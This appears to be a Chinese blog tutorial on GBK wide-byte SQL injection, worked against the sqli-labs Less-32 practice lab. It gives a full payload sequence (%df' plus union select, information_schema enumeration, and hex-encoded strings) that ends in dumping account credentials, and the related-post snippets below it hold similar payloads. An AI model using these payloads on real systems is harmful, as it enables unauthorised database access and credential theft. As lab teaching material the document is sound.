【SQL注入09】宽字符注入基础与实操(基于sqli-labs-less32)

已于 2022-07-01 03:29:59 修改
阅读量3.7k 收藏 4
点赞数 4
分类专栏: # 筑基07:WEB漏洞原理 文章标签: sql 安全 web安全
于 2022-02-20 22:44:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123026788
版权

目录

1 宽字符注入概述

1.1GBK编码简介

  1. GBK全称《汉字内码扩展规范》。
  2. GBK 采用双字节表示,总体编码范围为 8140-FEFE,首字节在 81-FE 之间,尾字节在 40-FE 之间,剔除 xx7F 一条线。总计 23940 个码位,共收入 21886 个汉字和图形符号,其中汉字(包括部首和构件)21003 个,图形符号 883 个。
  3. 常用字符GBK编码
符号GBK编码
27
"22
|5C
#23
df5c

URL编码规律

  1. GET型的方式我们是以url形式提交的,因此数据会通过url编码,其实url编码就是一个字符ascii码的十六进制。不过稍微有些变动,需要在前面加上“%”。
  2. 比如“\”,它的ascii码是92,92的十六进制是5c,所以“\”的url编码就是%5c。那么汉字的url编码呢?很简单,看例子:“胡”的ascii码是 -17670,十六进制是BAFA,url编码是“%BA%FA”。

1.2 宽字符注入

  1. 定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的',就会被转义为\',无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。
  2. 适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。
  3. 原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。

2 实验平台

2.1 实验平台

  1. 靶机:CentOS7安装docker,利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
  2. 真实机:本实验利用火狐浏览器来实现,为方便注入过程的编码,建议安装一个扩展插件harkbar,安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用,就安装了HackBar Quantum来代替。
  3. 靶机与真实机桥接到同一局域网中。

2.2 实验目标

  1. 获取后台数据库账号及密码。

3 实验过程

3.1 前戏

  1. 真实机打开火狐浏览器,访问靶机IP地址,出现下图,可以不重置实验平台,直接点击Page2进入找到第32关实验。
    在这里插入图片描述
  2. 点击进入第32关,初始界面如下图:
    在这里插入图片描述

3.2 判断注入点及注入类型

  1. 输入参数为?id=1可以看到数据库成功返回第一个账户账号及密码。修改id=2则是返回第二个账号密码,说明id是一个访问者可以控制输入的参数且页面会根据参数进行响应,是一个注入点。
    在这里插入图片描述
  2. 修改参数为?id=1'可以看到数据库正常回显账号密码,但是提示信息如下,分析提示可知我们输入的单引号被转义成了\'
    在这里插入图片描述
  3. 遇到这种情况只能赌后台数据库编码是不是GBK了,修改参数为?id=1%df',按下图分析错误提醒信息可知该输入为字符型且为单引号闭合,同时可知可以实现宽字符注入。
    在这里插入图片描述

3.3 尝试使用union查询

  1. 目的:判断能否使用union联合查询注入。
  2. 修改参数为?id=1%df' order by 3--+,页面正常显示,当修改参数为4时,页面显示错误,说明回显内容有3列。
    在这里插入图片描述
  3. 修改参数为?id=-1%df' union select 1,2,3--+,可以看到2和3列数据可以回显。说明可以尝试union联合查询注入。
    在这里插入图片描述

3.4 获取库名表名字段名

  1. 获取库名。修改参数为?id=-1%df' union select 1,2,database()--+,发现本站点数据库为security。
    在这里插入图片描述
  2. 获取表名。修改参数为?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+,发现该数据库下公有4个表,其中有个users的表,是我们注入的目标。
    在这里插入图片描述
  3. 获取字段名。修改参数为?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'--+,该参数执行失败了,因为整个参数中的所有单引号都会被转义。
    在这里插入图片描述
  4. 用16进制代替英文字符串输入,可以无需使用单引号来括住users,很多工具可以将字符串转为16进制,users转为16进制就是7573657273,为了表示该数是16进制,需要在前面加上0x。修改参数为?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+,该参数执行失败了,因为整个参数中的所有单引号都会被转义。
    在这里插入图片描述
  5. 获取字段内容。修改参数为?id=-1%df' union select 1,2,group_concat(id,0x3a,username,0x3a,password) from users--+,该参数中0x3a是冒号的16进制格式,同样也是为了避免使用单引号导致被转义的问题。
    在这里插入图片描述

3.5 实验结果

在上一步成功爆出一堆账号密码,实验成功。

4 总结

  1. 了解GBK编码简单信息;
  2. 理解字节何时会被当做GBK进行解码;
  3. 理解宽字符注入的原理;
  4. 掌握宽字符注入的方法。
Fighting_hawk
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
gbk字符编码和字节sql注入
sworddancing is the best one
09-27 2541
ctf题目中字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
字节(字符注入
qq_40268306的博客
09-11 1210
了解了很多的web后端验证的问题,特别是与数据库交汇的这部分我觉得有很大一部分吧,是需要长期的积累, 知识的学习本来是就是互相推翻之前学习的成果,然后建立新的思想,巩固自己的思维发展 字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 ...
SQL注入字符注入
游魂的博客
12-06 802
字符注入: 由于$_GET[‘ID’]用addslashes()函数过滤了,直接输入单引号会被\’转义,所以用%df双字节会被识别为汉字,进而绕过了转义。 php代码: $id=addslashes($_GET[‘id’]);//进行了转义 例子: 1.http://xxxx.com/xx.php?id=1’ 或 and 1=2 或则 order by 100返回的都是正常页面 以上测试返回...
mysql字符注入
一个码农的笔记
10-14 2439
先补充一点背景: 大 家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字 符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等字节字符集,则MySQL会认为
gbk双字节注入
左手诗人 右手剑客
06-12 354
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
字符注入详解
qq_35191331的博客
08-16 3102
要了解的一些字符,以及mysql知识 字符:  (1)%27 ' (2)%20 空格 (3)'%23 # (4)%df 運(说明,也可以是其他的%d1之类,解析之后变成中文字符) mysql中 # 是注释语句,union语句 第一步:找注入点 (1)先http://103.238.227.13:10083/?id=-1'
字节注入实例
七月_的博客
08-09 2090
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
有趣的注入字节注入
xiao白帽子学习之路
12-03 2675
ctf:有趣的注入 url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入" %df’ "(字节注入,显示报错。) 截图: x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +...
mysql中的字符注入_深入理解Mysql字符注入
weixin_32452127的博客
02-10 244
之前记录过一篇 写的不够详细概念字节是相对于ascII这样单字节而言的;像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节原理mysql在使用GBK编码会认为两个字符为一个汉字,只要前一个字符的ascii码>128就是汉字的编...
字节注入
热门推荐
heiseweiye的博客
09-16 1万+
GBK注射 字节注入 ** 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的字节注入,当存在字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。 ** http://chinalover.sinaapp.com/SQL-GBK/in...
字节注入详解
xyx107的博客
08-11 5163
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
SQL注入字节注入
最新发布
qq_68163788的博客
01-31 1555
字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的https://github.com/Audi-1/sqli-labs下载sqli-labs项目。 2. 安装Web服务器:您需要在本地或者服务器上安装一个Web服务器,例如Apache或Nginx。 3. 将sqli-labs项目放置在Web服务器的根目录下:将下载的sqli-labs项目解压,并将解压后的文件夹放置在Web服务器的根目录下。 4. 配置数据库:sqli-labs使用MySQL数据库作为后端数据库。您需要创建一个新的数据库,并将数据库的连接信息配置到sqli-labs项目的配置文件中。 5. 导入数据库表结构:在MySQL数据库中,导入sqli-labs项目提供的SQL文件,以创建所需的表结构和数据。 6. 启动Web服务器:启动您的Web服务器,并确保sqli-labs项目可以通过浏览器访问。 7. 访问sqli-labs靶场:在浏览器中输入您的Web服务器地址,加上sqli-labs项目的路径,即可访问sqli-labs靶场。 请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了SQL注入的风险,并采取适当的安全措施,以避免对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值